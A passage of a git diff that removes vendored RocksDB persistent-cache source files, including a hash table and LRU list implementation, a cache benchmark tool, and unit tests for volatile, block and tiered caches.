-    const uint32_t bucket_idx = h % hash_table::nbuckets_;
-    const uint32_t lock_idx = bucket_idx % hash_table::nlocks_;
-    return lru_lists_[lock_idx];
-  }
-
-  port::RWMutex& GetMutex(const uint64_t h) {
-    const uint32_t bucket_idx = h % hash_table::nbuckets_;
-    const uint32_t lock_idx = bucket_idx % hash_table::nlocks_;
-    return hash_table::locks_[lock_idx];
-  }
-
-  std::unique_ptr<LRUListType[]> lru_lists_;
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_test.cc b/thirdparty/rocksdb/utilities/persistent_cache/hash_table_test.cc
deleted file mode 100644
index 1a6df4e..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_test.cc
+++ /dev/null
@@ -1,158 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <stdlib.h>
-#include <iostream>
-#include <set>
-#include <string>
-
-#include "db/db_test_util.h"
-#include "util/arena.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "utilities/persistent_cache/hash_table.h"
-#include "utilities/persistent_cache/hash_table_evictable.h"
-
-#ifndef ROCKSDB_LITE
-
-namespace rocksdb {
-
-struct HashTableTest : public testing::Test {
-  ~HashTableTest() { map_.Clear(&HashTableTest::ClearNode); }
-
-  struct Node {
-    Node() {}
-    explicit Node(const uint64_t key, const std::string& val = std::string())
-        : key_(key), val_(val) {}
-
-    uint64_t key_ = 0;
-    std::string val_;
-  };
-
-  struct Equal {
-    bool operator()(const Node& lhs, const Node& rhs) {
-      return lhs.key_ == rhs.key_;
-    }
-  };
-
-  struct Hash {
-    uint64_t operator()(const Node& node) {
-      return std::hash<uint64_t>()(node.key_);
-    }
-  };
-
-  static void ClearNode(Node node) {}
-
-  HashTable<Node, Hash, Equal> map_;
-};
-
-struct EvictableHashTableTest : public testing::Test {
-  ~EvictableHashTableTest() { map_.Clear(&EvictableHashTableTest::ClearNode); }
-
-  struct Node : LRUElement<Node> {
-    Node() {}
-    explicit Node(const uint64_t key, const std::string& val = std::string())
-        : key_(key), val_(val) {}
-
-    uint64_t key_ = 0;
-    std::string val_;
-    std::atomic<uint32_t> refs_{0};
-  };
-
-  struct Equal {
-    bool operator()(const Node* lhs, const Node* rhs) {
-      return lhs->key_ == rhs->key_;
-    }
-  };
-
-  struct Hash {
-    uint64_t operator()(const Node* node) {
-      return std::hash<uint64_t>()(node->key_);
-    }
-  };
-
-  static void ClearNode(Node* node) {}
-
-  EvictableHashTable<Node, Hash, Equal> map_;
-};
-
-TEST_F(HashTableTest, TestInsert) {
-  const uint64_t max_keys = 1024 * 1024;
-
-  // insert
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    map_.Insert(Node(k, std::string(1000, k % 255)));
-  }
-
-  // verify
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    Node val;
-    port::RWMutex* rlock = nullptr;
-    assert(map_.Find(Node(k), &val, &rlock));
-    rlock->ReadUnlock();
-    assert(val.val_ == std::string(1000, k % 255));
-  }
-}
-
-TEST_F(HashTableTest, TestErase) {
-  const uint64_t max_keys = 1024 * 1024;
-  // insert
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    map_.Insert(Node(k, std::string(1000, k % 255)));
-  }
-
-  auto rand = Random64(time(nullptr));
-  // erase a few keys randomly
-  std::set<uint64_t> erased;
-  for (int i = 0; i < 1024; ++i) {
-    uint64_t k = rand.Next() % max_keys;
-    if (erased.find(k) != erased.end()) {
-      continue;
-    }
-    assert(map_.Erase(Node(k), /*ret=*/nullptr));
-    erased.insert(k);
-  }
-
-  // verify
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    Node val;
-    port::RWMutex* rlock = nullptr;
-    bool status = map_.Find(Node(k), &val, &rlock);
-    if (erased.find(k) == erased.end()) {
-      assert(status);
-      rlock->ReadUnlock();
-      assert(val.val_ == std::string(1000, k % 255));
-    } else {
-      assert(!status);
-    }
-  }
-}
-
-TEST_F(EvictableHashTableTest, TestEvict) {
-  const uint64_t max_keys = 1024 * 1024;
-
-  // insert
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    map_.Insert(new Node(k, std::string(1000, k % 255)));
-  }
-
-  // verify
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    Node* val = map_.Evict();
-    // unfortunately we can't predict eviction value since it is from any one of
-    // the lock stripe
-    assert(val);
-    assert(val->val_ == std::string(1000, val->key_ % 255));
-    delete val;
-  }
-}
-
-}  // namespace rocksdb
-#endif
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/lrulist.h b/thirdparty/rocksdb/utilities/persistent_cache/lrulist.h
deleted file mode 100644
index 1d2ef31..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/lrulist.h
+++ /dev/null
@@ -1,174 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-// LRU element definition
-//
-// Any object that needs to be part of the LRU algorithm should extend this
-// class
-template <class T>
-struct LRUElement {
-  explicit LRUElement() : next_(nullptr), prev_(nullptr), refs_(0) {}
-
-  virtual ~LRUElement() { assert(!refs_); }
-
-  T* next_;
-  T* prev_;
-  std::atomic<size_t> refs_;
-};
-
-// LRU implementation
-//
-// In place LRU implementation. There is no copy or allocation involved when
-// inserting or removing an element. This makes the data structure slim
-template <class T>
-class LRUList {
- public:
-  virtual ~LRUList() {
-    MutexLock _(&lock_);
-    assert(!head_);
-    assert(!tail_);
-  }
-
-  // Push element into the LRU at the cold end
-  inline void Push(T* const t) {
-    assert(t);
-    assert(!t->next_);
-    assert(!t->prev_);
-
-    MutexLock _(&lock_);
-
-    assert((!head_ && !tail_) || (head_ && tail_));
-    assert(!head_ || !head_->prev_);
-    assert(!tail_ || !tail_->next_);
-
-    t->next_ = head_;
-    if (head_) {
-      head_->prev_ = t;
-    }
-
-    head_ = t;
-    if (!tail_) {
-      tail_ = t;
-    }
-  }
-
-  // Unlink the element from the LRU
-  inline void Unlink(T* const t) {
-    MutexLock _(&lock_);
-    UnlinkImpl(t);
-  }
-
-  // Evict an element from the LRU
-  inline T* Pop() {
-    MutexLock _(&lock_);
-
-    assert(tail_ && head_);
-    assert(!tail_->next_);
-    assert(!head_->prev_);
-
-    T* t = head_;
-    while (t && t->refs_) {
-      t = t->next_;
-    }
-
-    if (!t) {
-      // nothing can be evicted
-      return nullptr;
-    }
-
-    assert(!t->refs_);
-
-    // unlike the element
-    UnlinkImpl(t);
-    return t;
-  }
-
-  // Move the element from the front of the list to the back of the list
-  inline void Touch(T* const t) {
-    MutexLock _(&lock_);
-    UnlinkImpl(t);
-    PushBackImpl(t);
-  }
-
-  // Check if the LRU is empty
-  inline bool IsEmpty() const {
-    MutexLock _(&lock_);
-    return !head_ && !tail_;
-  }
-
- private:
-  // Unlink an element from the LRU
-  void UnlinkImpl(T* const t) {
-    assert(t);
-
-    lock_.AssertHeld();
-
-    assert(head_ && tail_);
-    assert(t->prev_ || head_ == t);
-    assert(t->next_ || tail_ == t);
-
-    if (t->prev_) {
-      t->prev_->next_ = t->next_;
-    }
-    if (t->next_) {
-      t->next_->prev_ = t->prev_;
-    }
-
-    if (tail_ == t) {
-      tail_ = tail_->prev_;
-    }
-    if (head_ == t) {
-      head_ = head_->next_;
-    }
-
-    t->next_ = t->prev_ = nullptr;
-  }
-
-  // Insert an element at the hot end
-  inline void PushBack(T* const t) {
-    MutexLock _(&lock_);
-    PushBackImpl(t);
-  }
-
-  inline void PushBackImpl(T* const t) {
-    assert(t);
-    assert(!t->next_);
-    assert(!t->prev_);
-
-    lock_.AssertHeld();
-
-    assert((!head_ && !tail_) || (head_ && tail_));
-    assert(!head_ || !head_->prev_);
-    assert(!tail_ || !tail_->next_);
-
-    t->prev_ = tail_;
-    if (tail_) {
-      tail_->next_ = t;
-    }
-
-    tail_ = t;
-    if (!head_) {
-      head_ = tail_;
-    }
-  }
-
-  mutable port::Mutex lock_;  // synchronization primitive
-  T* head_ = nullptr;         // front (cold)
-  T* tail_ = nullptr;         // back (hot)
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_bench.cc b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_bench.cc
deleted file mode 100644
index 4aeb054..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_bench.cc
+++ /dev/null
@@ -1,360 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() { fprintf(stderr, "Please install gflags to run tools\n"); }
-#else
-#include <gflags/gflags.h>
-#include <atomic>
-#include <functional>
-#include <memory>
-#include <sstream>
-#include <unordered_map>
-
-#include "rocksdb/env.h"
-
-#include "utilities/persistent_cache/block_cache_tier.h"
-#include "utilities/persistent_cache/persistent_cache_tier.h"
-#include "utilities/persistent_cache/volatile_tier_impl.h"
-
-#include "monitoring/histogram.h"
-#include "port/port.h"
-#include "table/block_builder.h"
-#include "util/mutexlock.h"
-#include "util/stop_watch.h"
-
-DEFINE_int32(nsec, 10, "nsec");
-DEFINE_int32(nthread_write, 1, "Insert threads");
-DEFINE_int32(nthread_read, 1, "Lookup threads");
-DEFINE_string(path, "/tmp/microbench/blkcache", "Path for cachefile");
-DEFINE_string(log_path, "/tmp/log", "Path for the log file");
-DEFINE_uint64(cache_size, std::numeric_limits<uint64_t>::max(), "Cache size");
-DEFINE_int32(iosize, 4 * 1024, "Read IO size");
-DEFINE_int32(writer_iosize, 4 * 1024, "File writer IO size");
-DEFINE_int32(writer_qdepth, 1, "File writer qdepth");
-DEFINE_bool(enable_pipelined_writes, false, "Enable async writes");
-DEFINE_string(cache_type, "block_cache",
-              "Cache type. (block_cache, volatile, tiered)");
-DEFINE_bool(benchmark, false, "Benchmark mode");
-DEFINE_int32(volatile_cache_pct, 10, "Percentage of cache in memory tier.");
-
-namespace rocksdb {
-
-std::unique_ptr<PersistentCacheTier> NewVolatileCache() {
-  assert(FLAGS_cache_size != std::numeric_limits<uint64_t>::max());
-  std::unique_ptr<PersistentCacheTier> pcache(
-      new VolatileCacheTier(FLAGS_cache_size));
-  return pcache;
-}
-
-std::unique_ptr<PersistentCacheTier> NewBlockCache() {
-  std::shared_ptr<Logger> log;
-  if (!Env::Default()->NewLogger(FLAGS_log_path, &log).ok()) {
-    fprintf(stderr, "Error creating log %s \n", FLAGS_log_path.c_str());
-    return nullptr;
-  }
-
-  PersistentCacheConfig opt(Env::Default(), FLAGS_path, FLAGS_cache_size, log);
-  opt.writer_dispatch_size = FLAGS_writer_iosize;
-  opt.writer_qdepth = FLAGS_writer_qdepth;
-  opt.pipeline_writes = FLAGS_enable_pipelined_writes;
-  opt.max_write_pipeline_backlog_size = std::numeric_limits<uint64_t>::max();
-  std::unique_ptr<PersistentCacheTier> cache(new BlockCacheTier(opt));
-  Status status = cache->Open();
-  return cache;
-}
-
-// create a new cache tier
-// construct a tiered RAM+Block cache
-std::unique_ptr<PersistentTieredCache> NewTieredCache(
-    const size_t mem_size, const PersistentCacheConfig& opt) {
-  std::unique_ptr<PersistentTieredCache> tcache(new PersistentTieredCache());
-  // create primary tier
-  assert(mem_size);
-  auto pcache =
-      std::shared_ptr<PersistentCacheTier>(new VolatileCacheTier(mem_size));
-  tcache->AddTier(pcache);
-  // create secondary tier
-  auto scache = std::shared_ptr<PersistentCacheTier>(new BlockCacheTier(opt));
-  tcache->AddTier(scache);
-
-  Status s = tcache->Open();
-  assert(s.ok());
-  return tcache;
-}
-
-std::unique_ptr<PersistentTieredCache> NewTieredCache() {
-  std::shared_ptr<Logger> log;
-  if (!Env::Default()->NewLogger(FLAGS_log_path, &log).ok()) {
-    fprintf(stderr, "Error creating log %s \n", FLAGS_log_path.c_str());
-    abort();
-  }
-
-  auto pct = FLAGS_volatile_cache_pct / static_cast<double>(100);
-  PersistentCacheConfig opt(Env::Default(), FLAGS_path,
-                            (1 - pct) * FLAGS_cache_size, log);
-  opt.writer_dispatch_size = FLAGS_writer_iosize;
-  opt.writer_qdepth = FLAGS_writer_qdepth;
-  opt.pipeline_writes = FLAGS_enable_pipelined_writes;
-  opt.max_write_pipeline_backlog_size = std::numeric_limits<uint64_t>::max();
-  return NewTieredCache(FLAGS_cache_size * pct, opt);
-}
-
-//
-// Benchmark driver
-//
-class CacheTierBenchmark {
- public:
-  explicit CacheTierBenchmark(std::shared_ptr<PersistentCacheTier>&& cache)
-      : cache_(cache) {
-    if (FLAGS_nthread_read) {
-      fprintf(stdout, "Pre-populating\n");
-      Prepop();
-      fprintf(stdout, "Pre-population completed\n");
-    }
-
-    stats_.Clear();
-
-    // Start IO threads
-    std::list<port::Thread> threads;
-    Spawn(FLAGS_nthread_write, &threads,
-          std::bind(&CacheTierBenchmark::Write, this));
-    Spawn(FLAGS_nthread_read, &threads,
-          std::bind(&CacheTierBenchmark::Read, this));
-
-    // Wait till FLAGS_nsec and then signal to quit
-    StopWatchNano t(Env::Default(), /*auto_start=*/true);
-    size_t sec = t.ElapsedNanos() / 1000000000ULL;
-    while (!quit_) {
-      sec = t.ElapsedNanos() / 1000000000ULL;
-      quit_ = sec > size_t(FLAGS_nsec);
-      /* sleep override */ sleep(1);
-    }
-
-    // Wait for threads to exit
-    Join(&threads);
-    // Print stats
-    PrintStats(sec);
-    // Close the cache
-    cache_->TEST_Flush();
-    cache_->Close();
-  }
-
- private:
-  void PrintStats(const size_t sec) {
-    std::ostringstream msg;
-    msg << "Test stats" << std::endl
-        << "* Elapsed: " << sec << " s" << std::endl
-        << "* Write Latency:" << std::endl
-        << stats_.write_latency_.ToString() << std::endl
-        << "* Read Latency:" << std::endl
-        << stats_.read_latency_.ToString() << std::endl
-        << "* Bytes written:" << std::endl
-        << stats_.bytes_written_.ToString() << std::endl
-        << "* Bytes read:" << std::endl
-        << stats_.bytes_read_.ToString() << std::endl
-        << "Cache stats:" << std::endl
-        << cache_->PrintStats() << std::endl;
-    fprintf(stderr, "%s\n", msg.str().c_str());
-  }
-
-  //
-  // Insert implementation and corresponding helper functions
-  //
-  void Prepop() {
-    for (uint64_t i = 0; i < 1024 * 1024; ++i) {
-      InsertKey(i);
-      insert_key_limit_++;
-      read_key_limit_++;
-    }
-
-    // Wait until data is flushed
-    cache_->TEST_Flush();
-    // warmup the cache
-    for (uint64_t i = 0; i < 1024 * 1024; ReadKey(i++)) {
-    }
-  }
-
-  void Write() {
-    while (!quit_) {
-      InsertKey(insert_key_limit_++);
-    }
-  }
-
-  void InsertKey(const uint64_t key) {
-    // construct key
-    uint64_t k[3];
-    Slice block_key = FillKey(k, key);
-
-    // construct value
-    auto block = NewBlock(key);
-
-    // insert
-    StopWatchNano timer(Env::Default(), /*auto_start=*/true);
-    while (true) {
-      Status status = cache_->Insert(block_key, block.get(), FLAGS_iosize);
-      if (status.ok()) {
-        break;
-      }
-
-      // transient error is possible if we run without pipelining
-      assert(!FLAGS_enable_pipelined_writes);
-    }
-
-    // adjust stats
-    const size_t elapsed_micro = timer.ElapsedNanos() / 1000;
-    stats_.write_latency_.Add(elapsed_micro);
-    stats_.bytes_written_.Add(FLAGS_iosize);
-  }
-
-  //
-  // Read implementation
-  //
-  void Read() {
-    while (!quit_) {
-      ReadKey(random() % read_key_limit_);
-    }
-  }
-
-  void ReadKey(const uint64_t val) {
-    // construct key
-    uint64_t k[3];
-    Slice key = FillKey(k, val);
-
-    // Lookup in cache
-    StopWatchNano timer(Env::Default(), /*auto_start=*/true);
-    std::unique_ptr<char[]> block;
-    size_t size;
-    Status status = cache_->Lookup(key, &block, &size);
-    if (!status.ok()) {
-      fprintf(stderr, "%s\n", status.ToString().c_str());
-    }
-    assert(status.ok());
-    assert(size == (size_t) FLAGS_iosize);
-
-    // adjust stats
-    const size_t elapsed_micro = timer.ElapsedNanos() / 1000;
-    stats_.read_latency_.Add(elapsed_micro);
-    stats_.bytes_read_.Add(FLAGS_iosize);
-
-    // verify content
-    if (!FLAGS_benchmark) {
-      auto expected_block = NewBlock(val);
-      assert(memcmp(block.get(), expected_block.get(), FLAGS_iosize) == 0);
-    }
-  }
-
-  // create data for a key by filling with a certain pattern
-  std::unique_ptr<char[]> NewBlock(const uint64_t val) {
-    unique_ptr<char[]> data(new char[FLAGS_iosize]);
-    memset(data.get(), val % 255, FLAGS_iosize);
-    return data;
-  }
-
-  // spawn threads
-  void Spawn(const size_t n, std::list<port::Thread>* threads,
-             const std::function<void()>& fn) {
-    for (size_t i = 0; i < n; ++i) {
-      threads->emplace_back(fn);
-    }
-  }
-
-  // join threads
-  void Join(std::list<port::Thread>* threads) {
-    for (auto& th : *threads) {
-      th.join();
-    }
-  }
-
-  // construct key
-  Slice FillKey(uint64_t (&k)[3], const uint64_t val) {
-    k[0] = k[1] = 0;
-    k[2] = val;
-    void* p = static_cast<void*>(&k);
-    return Slice(static_cast<char*>(p), sizeof(k));
-  }
-
-  // benchmark stats
-  struct Stats {
-    void Clear() {
-      bytes_written_.Clear();
-      bytes_read_.Clear();
-      read_latency_.Clear();
-      write_latency_.Clear();
-    }
-
-    HistogramImpl bytes_written_;
-    HistogramImpl bytes_read_;
-    HistogramImpl read_latency_;
-    HistogramImpl write_latency_;
-  };
-
-  std::shared_ptr<PersistentCacheTier> cache_;  // cache implementation
-  std::atomic<uint64_t> insert_key_limit_{0};   // data inserted upto
-  std::atomic<uint64_t> read_key_limit_{0};     // data can be read safely upto
-  bool quit_ = false;                           // Quit thread ?
-  mutable Stats stats_;                         // Stats
-};
-
-}  // namespace rocksdb
-
-//
-// main
-//
-int main(int argc, char** argv) {
-  GFLAGS::SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                          " [OPTIONS]...");
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, false);
-
-  std::ostringstream msg;
-  msg << "Config" << std::endl
-      << "======" << std::endl
-      << "* nsec=" << FLAGS_nsec << std::endl
-      << "* nthread_write=" << FLAGS_nthread_write << std::endl
-      << "* path=" << FLAGS_path << std::endl
-      << "* cache_size=" << FLAGS_cache_size << std::endl
-      << "* iosize=" << FLAGS_iosize << std::endl
-      << "* writer_iosize=" << FLAGS_writer_iosize << std::endl
-      << "* writer_qdepth=" << FLAGS_writer_qdepth << std::endl
-      << "* enable_pipelined_writes=" << FLAGS_enable_pipelined_writes
-      << std::endl
-      << "* cache_type=" << FLAGS_cache_type << std::endl
-      << "* benchmark=" << FLAGS_benchmark << std::endl
-      << "* volatile_cache_pct=" << FLAGS_volatile_cache_pct << std::endl;
-
-  fprintf(stderr, "%s\n", msg.str().c_str());
-
-  std::shared_ptr<rocksdb::PersistentCacheTier> cache;
-  if (FLAGS_cache_type == "block_cache") {
-    fprintf(stderr, "Using block cache implementation\n");
-    cache = rocksdb::NewBlockCache();
-  } else if (FLAGS_cache_type == "volatile") {
-    fprintf(stderr, "Using volatile cache implementation\n");
-    cache = rocksdb::NewVolatileCache();
-  } else if (FLAGS_cache_type == "tiered") {
-    fprintf(stderr, "Using tiered cache implementation\n");
-    cache = rocksdb::NewTieredCache();
-  } else {
-    fprintf(stderr, "Unknown option for cache\n");
-  }
-
-  assert(cache);
-  if (!cache) {
-    fprintf(stderr, "Error creating cache\n");
-    abort();
-  }
-
-  std::unique_ptr<rocksdb::CacheTierBenchmark> benchmark(
-      new rocksdb::CacheTierBenchmark(std::move(cache)));
-
-  return 0;
-}
-#endif  // #ifndef GFLAGS
-#else
-int main(int, char**) { return 0; }
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.cc b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.cc
deleted file mode 100644
index 5affc40..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.cc
+++ /dev/null
@@ -1,471 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/persistent_cache_test.h"
-
-#include <functional>
-#include <memory>
-#include <thread>
-
-#include "utilities/persistent_cache/block_cache_tier.h"
-
-namespace rocksdb {
-
-static const double kStressFactor = .125;
-
-#ifdef OS_LINUX
-static void OnOpenForRead(void* arg) {
-  int* val = static_cast<int*>(arg);
-  *val &= ~O_DIRECT;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "NewRandomAccessFile:O_DIRECT",
-      std::bind(OnOpenForRead, std::placeholders::_1));
-}
-
-static void OnOpenForWrite(void* arg) {
-  int* val = static_cast<int*>(arg);
-  *val &= ~O_DIRECT;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "NewWritableFile:O_DIRECT",
-      std::bind(OnOpenForWrite, std::placeholders::_1));
-}
-#endif
-
-static void RemoveDirectory(const std::string& folder) {
-  std::vector<std::string> files;
-  Status status = Env::Default()->GetChildren(folder, &files);
-  if (!status.ok()) {
-    // we assume the directory does not exist
-    return;
-  }
-
-  // cleanup files with the patter :digi:.rc
-  for (auto file : files) {
-    if (file == "." || file == "..") {
-      continue;
-    }
-    status = Env::Default()->DeleteFile(folder + "/" + file);
-    assert(status.ok());
-  }
-
-  status = Env::Default()->DeleteDir(folder);
-  assert(status.ok());
-}
-
-static void OnDeleteDir(void* arg) {
-  char* dir = static_cast<char*>(arg);
-  RemoveDirectory(std::string(dir));
-}
-
-//
-// Simple logger that prints message on stdout
-//
-class ConsoleLogger : public Logger {
- public:
-  using Logger::Logv;
-  ConsoleLogger() : Logger(InfoLogLevel::ERROR_LEVEL) {}
-
-  void Logv(const char* format, va_list ap) override {
-    MutexLock _(&lock_);
-    vprintf(format, ap);
-    printf("\n");
-  }
-
-  port::Mutex lock_;
-};
-
-// construct a tiered RAM+Block cache
-std::unique_ptr<PersistentTieredCache> NewTieredCache(
-    const size_t mem_size, const PersistentCacheConfig& opt) {
-  std::unique_ptr<PersistentTieredCache> tcache(new PersistentTieredCache());
-  // create primary tier
-  assert(mem_size);
-  auto pcache = std::shared_ptr<PersistentCacheTier>(new VolatileCacheTier(
-      /*is_compressed*/ true, mem_size));
-  tcache->AddTier(pcache);
-  // create secondary tier
-  auto scache = std::shared_ptr<PersistentCacheTier>(new BlockCacheTier(opt));
-  tcache->AddTier(scache);
-
-  Status s = tcache->Open();
-  assert(s.ok());
-  return tcache;
-}
-
-// create block cache
-std::unique_ptr<PersistentCacheTier> NewBlockCache(
-    Env* env, const std::string& path,
-    const uint64_t max_size = std::numeric_limits<uint64_t>::max(),
-    const bool enable_direct_writes = false) {
-  const uint32_t max_file_size = static_cast<uint32_t>(12 * 1024 * 1024 * kStressFactor);
-  auto log = std::make_shared<ConsoleLogger>();
-  PersistentCacheConfig opt(env, path, max_size, log);
-  opt.cache_file_size = max_file_size;
-  opt.max_write_pipeline_backlog_size = std::numeric_limits<uint64_t>::max();
-  opt.enable_direct_writes = enable_direct_writes;
-  std::unique_ptr<PersistentCacheTier> scache(new BlockCacheTier(opt));
-  Status s = scache->Open();
-  assert(s.ok());
-  return scache;
-}
-
-// create a new cache tier
-std::unique_ptr<PersistentTieredCache> NewTieredCache(
-    Env* env, const std::string& path, const uint64_t max_volatile_cache_size,
-    const uint64_t max_block_cache_size =
-        std::numeric_limits<uint64_t>::max()) {
-  const uint32_t max_file_size = static_cast<uint32_t>(12 * 1024 * 1024 * kStressFactor);
-  auto log = std::make_shared<ConsoleLogger>();
-  auto opt = PersistentCacheConfig(env, path, max_block_cache_size, log);
-  opt.cache_file_size = max_file_size;
-  opt.max_write_pipeline_backlog_size = std::numeric_limits<uint64_t>::max();
-  // create tier out of the two caches
-  auto cache = NewTieredCache(max_volatile_cache_size, opt);
-  return cache;
-}
-
-PersistentCacheTierTest::PersistentCacheTierTest()
-    : path_(test::TmpDir(Env::Default()) + "/cache_test") {
-#ifdef OS_LINUX
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("NewRandomAccessFile:O_DIRECT",
-                                                 OnOpenForRead);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("NewWritableFile:O_DIRECT",
-                                                 OnOpenForWrite);
-#endif
-}
-
-// Block cache tests
-TEST_F(PersistentCacheTierTest, DISABLED_BlockCacheInsertWithFileCreateError) {
-  cache_ = NewBlockCache(Env::Default(), path_,
-                         /*size=*/std::numeric_limits<uint64_t>::max(),
-                         /*direct_writes=*/ false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack( 
-    "BlockCacheTier::NewCacheFile:DeleteDir", OnDeleteDir);
-
-  RunNegativeInsertTest(/*nthreads=*/ 1,
-                        /*max_keys*/
-                          static_cast<size_t>(10 * 1024 * kStressFactor));
-
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-}
-
-#ifdef TRAVIS
-// Travis is unable to handle the normal version of the tests running out of
-// fds, out of space and timeouts. This is an easier version of the test
-// specifically written for Travis
-TEST_F(PersistentCacheTierTest, BasicTest) {
-  cache_ = std::make_shared<VolatileCacheTier>();
-  RunInsertTest(/*nthreads=*/1, /*max_keys=*/1024);
-
-  cache_ = NewBlockCache(Env::Default(), path_,
-                         /*size=*/std::numeric_limits<uint64_t>::max(),
-                         /*direct_writes=*/true);
-  RunInsertTest(/*nthreads=*/1, /*max_keys=*/1024);
-
-  cache_ = NewTieredCache(Env::Default(), path_,
-                          /*memory_size=*/static_cast<size_t>(1 * 1024 * 1024));
-  RunInsertTest(/*nthreads=*/1, /*max_keys=*/1024);
-}
-#else
-// Volatile cache tests
-TEST_F(PersistentCacheTierTest, VolatileCacheInsert) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys :
-         {10 * 1024 * kStressFactor, 1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = std::make_shared<VolatileCacheTier>();
-      RunInsertTest(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-
-TEST_F(PersistentCacheTierTest, VolatileCacheInsertWithEviction) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys : {1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = std::make_shared<VolatileCacheTier>(
-          /*compressed=*/true, /*size=*/static_cast<size_t>(1 * 1024 * 1024 * kStressFactor));
-      RunInsertTestWithEviction(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-
-// Block cache tests
-TEST_F(PersistentCacheTierTest, BlockCacheInsert) {
-  for (auto direct_writes : {true, false}) {
-    for (auto nthreads : {1, 5}) {
-      for (auto max_keys :
-           {10 * 1024 * kStressFactor, 1 * 1024 * 1024 * kStressFactor}) {
-        cache_ = NewBlockCache(Env::Default(), path_,
-                               /*size=*/std::numeric_limits<uint64_t>::max(),
-                               direct_writes);
-        RunInsertTest(nthreads, static_cast<size_t>(max_keys));
-      }
-    }
-  }
-}
-
-TEST_F(PersistentCacheTierTest, BlockCacheInsertWithEviction) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys : {1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = NewBlockCache(Env::Default(), path_,
-                             /*max_size=*/static_cast<size_t>(200 * 1024 * 1024 * kStressFactor));
-      RunInsertTestWithEviction(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-
-// Tiered cache tests
-TEST_F(PersistentCacheTierTest, TieredCacheInsert) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys :
-         {10 * 1024 * kStressFactor, 1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = NewTieredCache(Env::Default(), path_,
-                              /*memory_size=*/static_cast<size_t>(1 * 1024 * 1024 * kStressFactor));
-      RunInsertTest(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-
-// the tests causes a lot of file deletions which Travis limited testing
-// environment cannot handle
-TEST_F(PersistentCacheTierTest, TieredCacheInsertWithEviction) {
-  for (auto nthreads : {1, 5}) {
-    for (auto max_keys : {1 * 1024 * 1024 * kStressFactor}) {
-      cache_ = NewTieredCache(
-          Env::Default(), path_,
-          /*memory_size=*/static_cast<size_t>(1 * 1024 * 1024 * kStressFactor),
-          /*block_cache_size*/ static_cast<size_t>(200 * 1024 * 1024 * kStressFactor));
-      RunInsertTestWithEviction(nthreads, static_cast<size_t>(max_keys));
-    }
-  }
-}
-#endif
-
-std::shared_ptr<PersistentCacheTier> MakeVolatileCache(
-    const std::string& /*dbname*/) {
-  return std::make_shared<VolatileCacheTier>();
-}
-
-std::shared_ptr<PersistentCacheTier> MakeBlockCache(const std::string& dbname) {
-  return NewBlockCache(Env::Default(), dbname);
-}
-
-std::shared_ptr<PersistentCacheTier> MakeTieredCache(
-    const std::string& dbname) {
-  const auto memory_size = 1 * 1024 * 1024 * kStressFactor;
